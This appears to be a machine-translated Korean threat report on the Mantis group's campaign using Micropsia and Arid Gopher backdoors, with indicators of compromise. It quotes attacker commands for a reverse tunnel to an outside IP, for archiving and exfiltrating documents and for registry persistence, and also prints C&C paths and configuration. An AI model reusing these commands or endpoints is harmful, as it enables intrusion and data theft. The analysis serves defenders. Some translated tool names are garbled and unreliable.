컨텍스트
Mantis는 2014년부터 활동했으며, 일부 타사 보고서에 따르면 2011년부터 활동했을 수도 있다고 합니다. 이 그룹은 이스라엘과 다른 여러 중동 국가의 조직을 표적으로 삼는 것으로 알려져 있습니다. 공격 대상에는 정부, 군사, 금융, 미디어, 교육, 에너지 및 싱크탱크가 포함됩니다. 이 그룹은 피싱 이메일과 가짜 소셜 미디어 프로필을 사용하여 공격 대상의 디바이스에 멀웨어를 설치하도록 유인하는 것으로 알려져 있습니다.
맨티스는 팔레스타인 지역과 관련이 있는 것으로 널리 알려져 있습니다. 시만텍은 어떤 팔레스타인 조직과도 연관성이 있다고 단정할 수 없지만, 다른 공급업체들은 이 그룹을 하마스와 연관짓고 있습니다.
최근 공격에서 이 그룹은 업데이트된 버전의 맞춤형 마이크로시아와 아리드 고퍼 백도어를 사용하여 표적을 감염시킨 후 광범위한 자격 증명 도용과 탈취한 데이터의 유출을 감행했습니다.
공격 체인
이 캠페인의 초기 감염 경로는 명확하지 않습니다. 공격 대상 중 한 조직에서는 공격자가 세 대의 컴퓨터에 동일한 도구 세트의 세 가지 버전(즉, 동일한 도구의 다른 변종)을 배포했습니다. 이러한 방식으로 공격을 격리하는 것은 예방 조치일 가능성이 높습니다. 도구 세트 중 하나가 발견되더라도 공격자는 여전히 대상 네트워크에서 지속적인 존재감을 유지할 수 있습니다.
다음은 세 가지 도구 세트 중 하나의 사용법에 대한 설명입니다:
악성 활동은 2022년 12월 18일에 처음 탐지되었습니다. 내장된 셸코드를 실행하는 Base64 인코딩 문자열을 로드하기 위해 세 개의 개별적인 난독화된 PowerShell 명령 세트가 실행되었습니다. 셸코드는 기본 TCP 프로토콜을 사용하여 명령 및 제어(C&C) 서버에서 셸코드를 다운로드하는 32비트 부트로더입니다: 104.194.222[...] 50 포트 4444로 다른 단계를 다운로드합니다.
공격자들은 12월 19일에 다시 돌아와 먼저 크리덴셜 덤프를 수행한 다음 Certutil과 BITSAdmin을 사용하여 Micropsia 백도어와 공개적으로 사용 가능한 SSH 클라이언트인 Putty를 다운로드했습니다.
그런 다음 Micropsia가 실행되어 C&C 서버에 접속하기 시작했습니다. 같은 날 같은 조직에 있는 다른 세 대의 컴퓨터에서도 Micropsia가 실행되었습니다. 각각의 경우 파일 이름의 이름을 딴 폴더에서 실행되었습니다:
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
한 컴퓨터에서는 Micropsia를 사용하여 외부 IP 주소로 역방향 양말 터널을 설정했습니다:
CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.] 50:443 [편집됨]
12월 20일, 감염된 컴퓨터 중 하나에서 창패키지.exe라는 알 수 없는 실행 파일을 실행하는 데 Micropsia가 사용되었습니다.
다음 날인 12월 21일, 감염된 다른 컴퓨터에 파일을 보관하기 위해 RAR이 실행되었습니다.
12월 22일부터 2023년 1월 2일까지 감염된 컴퓨터 세 대에서 Arid Gopher 백도어를 실행하는 데 사용되었으며, Arid Gopher는 레지스트리에 추가하여 재부팅 시 Arid Gopher 실행을 제공하는 SetRegRunKey.exe라는 도구를 실행하는 데 사용되었습니다. 지속성을 제공합니다. 또한 localsecuritypolicy.exe라는 알 수 없는 파일을 실행합니다(공격자는 이 파일 이름을 다른 곳에서 Arid Gopher 백도어로 사용함).
12월 28일에는 다른 세 대의 감염된 컴퓨터에서 윈도우패키지.exe를 실행하는 데 Micropsia가 사용되었습니다.
12월 31일, Arid Gopher는 감염된 두 대의 컴퓨터에서 networkswitcherdatamodell.exe 및 networkuefidiagsbootserver.exe라는 이름의 알 수 없는 파일 두 개를 실행했습니다.
1월 2일까지 공격자들은 사용하던 Arid Gopher의 버전을 비활성화하고 새로운 변종을 도입했습니다. 이것이 첫 번째 버전이 발견되었기 때문인지 아니면 표준 운영 절차 때문인지는 명확하지 않습니다.
1월 4일, Micropsia는 한 대의 컴퓨터에서 csidl_common_appdata\hostupbroker\hostupbroker.exe 폴더에서 hostupbroker.exe라는 이름의 알 수 없는 파일 두 개를 실행하는 데 사용되었고, 바로 이어서 RAR 파일이 유출되었습니다:
CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\01-04-2023-15-13-39_getf.rar
1월 9일, 한 대의 컴퓨터에서 알 수 없는 파일 두 개를 실행하는 데 Arid Gopher가 사용되었습니다:
csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
csidl_common_appdata\embeddedmodeservice\embeddedmodeservice.exe
마지막 악성 활동은 1월 12일 이후에 발생했는데, 이 때 Arid Gopher는 알 수 없는 파일 이름 localsecuritypolicy.exe를 10시간마다 실행하는 데 사용되었습니다.
마이크로피아
이 공격에 사용된 Micropsia 백도어 변종은 다른 공급업체에서 발견된 버전에서 약간 업데이트된 버전인 것으로 보입니다. 이 캠페인에서는 여러 파일 이름과 파일 경로를 사용하여 Micropsia가 배포되었습니다:
csidl_common_appdata\microsoft\dotnet35\microsoftdotnet35.exe
csidl_common_appdata\마이크로소프트서비스사용설명서\시스템프로퍼티internationaltime.exe
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
Micropsia는 실행을 위해 WMI를 사용하며, 주요 목적은 공격자의 보조 페이로드를 실행하는 것으로 보입니다. 여기에는 다음이 포함됩니다:
Arid Gopher(파일 이름: networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)
리버스 양말 터널러(일명 Revsocks)(파일 이름: windowsservicemanageav.exe)
데이터 유출 도구(파일 이름: windowsupserv.exe)
호스트업브로커.exe라는 이름의 알 수 없는 파일 두 개
알 수 없는 파일 이름 windowspackages.exe
또한 Micropsia는 데이터 유출에 대비하여 스크린샷, 키 로깅, WinRAR을 사용한 특정 파일 유형 보관과 같은 자체 기능을 제공합니다:
"%PROGRAMDATA%\소프트웨어 배포\WinRAR\Rar.exe" a-r -ep1 -v2500k - hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 "%PROGRAMDATA%\Software Distributions\Bdl\LMth__C_2023-02-13 17-14-41" "%USERPROFILE%*.xls" " %USERPROFILE%*.xlsx" "%USERPROFILE%*.doc" "%USERPROFILE%*. docx" "%USERPROFILE%*.csv" "%USERPROFILE%*.pdf" "%USERPROFILE%*.ppt" "%USERPROFILE%*.pptx" " %USERPROFILE%*.odt" "%USERPROFILE%*.mdb" "%USERPROFILE%*. accdb" "%USERPROFILE%*.accde" "%USERPROFILE%*.txt" "%USERPROFILE%*.rtf" "%USERPROFILE%*.vcf"
아리드 고퍼
델파이로 작성된 마이크로시아와 달리, 아레드 고퍼는 Go로 작성되었습니다. 이 캠페인에 사용된 Arid Gopher 버전에는 다음과 같은 임베디드 구성 요소가 포함되어 있습니다:
7za.exe - 7-Zip 실행 파일의 합법적인 사본
AttestationWmiProvider.exe - "실행" 레지스트리 값을 설정하는 도구
ServiceHubIdentityHost.exe - 옵티멈 X의 합법적인 Shortcut.exe 실행 파일 사본
Setup.env - 구성 파일
Arid Gopher는 또한 다음과 같은 알 수 없는 파일을 실행하는 데 사용됩니다: networkswitcherdatamodell.exe, localsecuritypolicy.exe 및 networkuefidiagsbootserver.exe, 그리고 다음을 사용하여 난독화된 파일을 다운로드 및 실행하는 것 외에도 PyArmor 난독화된 파일을 다운로드하고 실행합니다.
C&C 서버와 통신할 때 Arid Gopher는 장치를 한 경로에 등록한 다음 다른 경로에 연결하여 명령을 수신할 수 있습니다:
연결: http://jumpstartmail[.] com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.]) 134) - 장치를 등록하기 위해서일 수 있습니다.
다음: http://jumpstartmail[...] com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - 아마도 명령을 수신하기 위해
연결: http://salimafia[.] net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]) 32) - 장치를 등록하기 위해서일 수 있습니다.
다음: http://salimafia[...] net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - 아마도 명령을 수신하기 위해
공격자가 정기적으로 업데이트하고 재작성하여 탐지를 회피하는 것으로 보입니다. 멀웨어의 한 변종은 이전 버전의 고유 코드와 너무 달라서 하위 루틴에 이전 버전과 동일한 고유 코드가 포함되어 있지 않습니다. Mantis는 변종 간에 로직을 적극적으로 전환하는 것으로 보이며, 수동으로 수행하면 시간이 많이 소요되는 작업입니다.
| 명령 | 설명 |
|---|---|
| "c" | main.exC("cmd")와 관련이 있을 수 있습니다. |
| "d" | main.down2와 관련이 있을 수 있습니다. |
| "s" | main.OnDSH와 관련이 있을 수 있습니다. |
| "ci" | main.deviceProperties와 관련이 있을 수 있습니다. |
| "ps" | 아마도 main.exC("powershell")와 관련이 있을 것입니다. |
| "ra" | 아마도 main.RunAWithoutW와 관련이 있을 것입니다. |
| "sf" | main.updateSettings와 관련이 있을 수 있습니다. |
| "sl" | main.searchForLogs와 관련이 있을 수 있습니다. |
| "ua" | main.updateApp과 관련이 있을 수 있습니다. |
| "ut" | 아마도 main.updateT와 관련이 있을 것입니다. |
| "pwnr" | 아마도 main.exCWithoutW("powershell")와 관련이 있을 것입니다. |
| "rapp" | main.restartApp과 관련이 있을 수 있습니다. |
| "gelog" | main.upAppLogs와 관련이 있을 수 있습니다. |
| "ufbtt" | main.collectFi와 관련이 있을 수 있습니다. |
| "ufofd" | main.collectFiOrFol과 관련이 있을 수 있습니다. |
| "bwp" | main.browDat와 관련이 있을 수 있습니다. |
| "cbh" | main.delBD와 관련이 있을 수 있습니다. |
| "cwr" | main.exCWithoutW("cmd")와 관련이 있을 수 있습니다. |
| "gaf" | main.collectFi와 관련이 있을 수 있습니다. |
| "ntf" | main.collectNet과 관련이 있을 수 있습니다. |
| "smr" | main.updateSettings와 관련이 있을 수 있습니다. |
임베디드된 setup.env 파일은 분석된 Arid Gopher 변형에서 구성 데이터를 검색하는 데 사용되며 다음을 포함합니다:
DIR=WindowsPerceptionService
ENDPOINT=http://jumpstartmail[.] com/IURTIER3BNV4ER
LOGS=logs.txt
DID=code.txt
VER=6.1
EN=2
ST_METHOD=r
ST_MACHINE=false
ST_FLAGS=x
COMPRESSOR=7za.exe
DDIR=자원 파일
BW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002
SERVER_TOKEN=PDqMKZ91l2XDmDELOrKB
STAPP=AttestationWmiProvider.exe
SHORT_APP=서비스허브아이덴티티호스트.exe
setup.env 구성 파일은 Arid Gopher에 포함된 또 다른 파일인 AttestationWmiProvider.exe를 참조합니다. 이 파일은 재부팅 시 다른 실행 파일이 실행되도록 하기 위한 도우미로 사용되는 32비트 실행 파일입니다. 이 파일이 실행되면 다음 명령줄 매개 변수를 확인합니다:
"키" 문자열 인수 [RUN_VALUE_NAME] 포함
"값", 문자열 인수 [RUN_PATHNAME] 포함
그런 다음 함수 os/signal.Notify()를 사용하여 신호로부터 알림을 받도록 준비합니다. 알림을 받으면 다음 레지스트리 값을 설정합니다:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "[실행_값_이름]" = "[실행_. PATHNAME]"
지금까지의 조사에 따르면 이 파일은 재부팅 시 Arid Gopher를 실행하도록 설정합니다:
CSIDL_COMMON_APPDATA\attestationwmiprovider\attestationwmiprovider.exe -key=네트워크 가상화 시작 서비스 "-value= CSIDL_COMMON_APPDATA\네트워크가상화스타트서비스\네트워크가상화스타트서비스.exe -x"
데이터 유출 도구
공격자들은 또한 공격 대상 조직에서 탈취한 데이터를 유출하기 위해 사용자 지정 도구, 즉 WindowsUpServ.exe라는 64비트 PyInstaller 실행 파일을 사용했습니다. 이 도구는 실행 시 다음 명령줄 매개변수를 확인합니다:
"-d" "[파일_디렉토리]"
"-f" "[파일 이름]"
각 "-f" "[파일명]" 명령줄 인자에 대해 도구는 [파일명]의 내용을 업로드합니다. 각 "-d" "[파일 디렉토리]" 명령줄 인자에 대해 도구는 [파일 디렉토리] 폴더에 저장된 파일 목록을 가져와 각 파일의 내용을 업로드합니다.
각 파일을 업로드할 때 도구는 다음 매개변수와 함께 HTTP POST 요청을 C&C 서버로 보냅니다:
"kjdfnqweb": [THE_FILE_CONTENT]
"qyiwekq": [호스트 이름_오브_더_영향받은_컴퓨터]
원격 서버가 상태 코드 200으로 응답할 때마다 멀웨어는 로컬 디스크에서 업로드된 파일을 삭제합니다. 멀웨어는 또한 다음 파일에 일부 동작을 기록할 수 있습니다:
"C:\ProgramData\WindowsUpServ\success.txt"
"C:\ProgramData\WindowsUpServ\err.txt"
단호한 상대
광범위한 멀웨어 재작성과 개별 조직에 대한 공격을 여러 부분으로 분할하여 전체 공격이 탐지될 가능성을 줄이는 능력에서 알 수 있듯이, 맨티스는 성공 가능성을 극대화하기 위해 시간과 노력을 기꺼이 투자하는 결단력 있는 공격자로 보입니다.
IOC 지표
| SHA256 해시 | 파일 이름 | 설명 |
|---|---|---|
| 0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311 | networkvirtualizationservice.exe | 아리드 고퍼 |
| 3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529 | 네트워크 가상화 사진 서비스 | 아리드 고퍼 |
| 82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4 | networkvirtualizationfiaservice.exe | 아리드 고퍼 |
| 85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097 | 네트워크 가상화 inithservice.exe | 아리드 고퍼 |
| cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341 | networkvirtualizationfiaservice.exe | 아리드 고퍼 |
| f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8 | 네트워크 가상화 스타트 서비스 | 아리드 고퍼 |
| 21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8 | AttestationWmiProvider.exe | 아레드 고퍼 지속성 구성 요소 |
| 58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724 | windowsupserv.exe | 유출 도구 |
| 5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e | windowsupserv.exe | 유출 도구 |
| 0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038 | 다양한 | 마이크로피아 |
| 1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa | N/A | 마이크로피아 |
| 211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d | xboxaccessorymanagementservice.exe | 마이크로피아 |
| d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798 | systempropertiesinternationaltime.exe | 마이크로피아 |
| 5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4 | 네트워크 가상화 서비스 | 가능한 건조한 고퍼 |
| f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203 | runme.exe | 가능한 계량기 |
| c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b | systempropertiesinternationaltime.exe | 가능한 미세증 |
| f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb | windowsservicemanageav.exe | 리버스삭스 터널 |
| 411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299 | N/A | 셸코드 |
| 5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d | N/A | 셸코드 |
| 6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061 | N/A | 셸코드 |
| 11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e | SystemPropertiesInternationalTime.rar | 알 수 없는 파일 |
| 1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6 | networkswitcherdatamodel.exe | 알 수 없는 파일 |
| 220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c | hostupbroker.exe | 알 수 없는 파일 |
| 4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f | hostupbroker.exe | 알 수 없는 파일 |
| 4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02 | windowspackages.exe | 알 수 없는 파일 |
| 624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689 | _pytransform.dll | 알 수 없는 파일 |
| 7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4 | embeddedmodeservice.exe | 알 수 없는 파일 |
| 8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2 | localsecuritypolicy.exe | 알 수 없는 파일 |
| b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3 | embeddedmodeservice.exe | 알 수 없는 파일 |
| bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51 | localsecuritypolicy.exe | 알 수 없는 파일 |
| bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9 | networkuefidiagsbootserver.exe | 알 수 없는 파일 |
| d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842 | teamviewrremoteservice.exe | 알 수 없는 파일 |
| jumpstartmail[.] com | 아리드 고퍼 C&C | |
| paydayloansnew[.] com | 아리드 고퍼 C&C | |
| picture-world[.] 정보 | 아리드 고퍼 C&C | |
| rnacgroup[.] com | C&C | |
| 살리마피아[...] net | 아리드 고퍼 C&C | |
| seomoi[...] net | 아리드 고퍼 C&C | |
| soft-utils[.] com | C&C | |
| chloe-boreman[.] com | 마이크로피아 C&C | |
| 크리스톤 콜[.] com | 마이크로피아 C&C | |
| http://5.182.39[.] 44/ESUZMWMRTATJJ/CMSNVBYAWTTF/MKXNHQWDYWBU | 유출 도구 C&C |
최고 보안 책임자의 원본 기사, 복제할 경우 출처 표시: https://cncso.com/kr/mantis-used-in-attacks-against-palestinian-targets.html
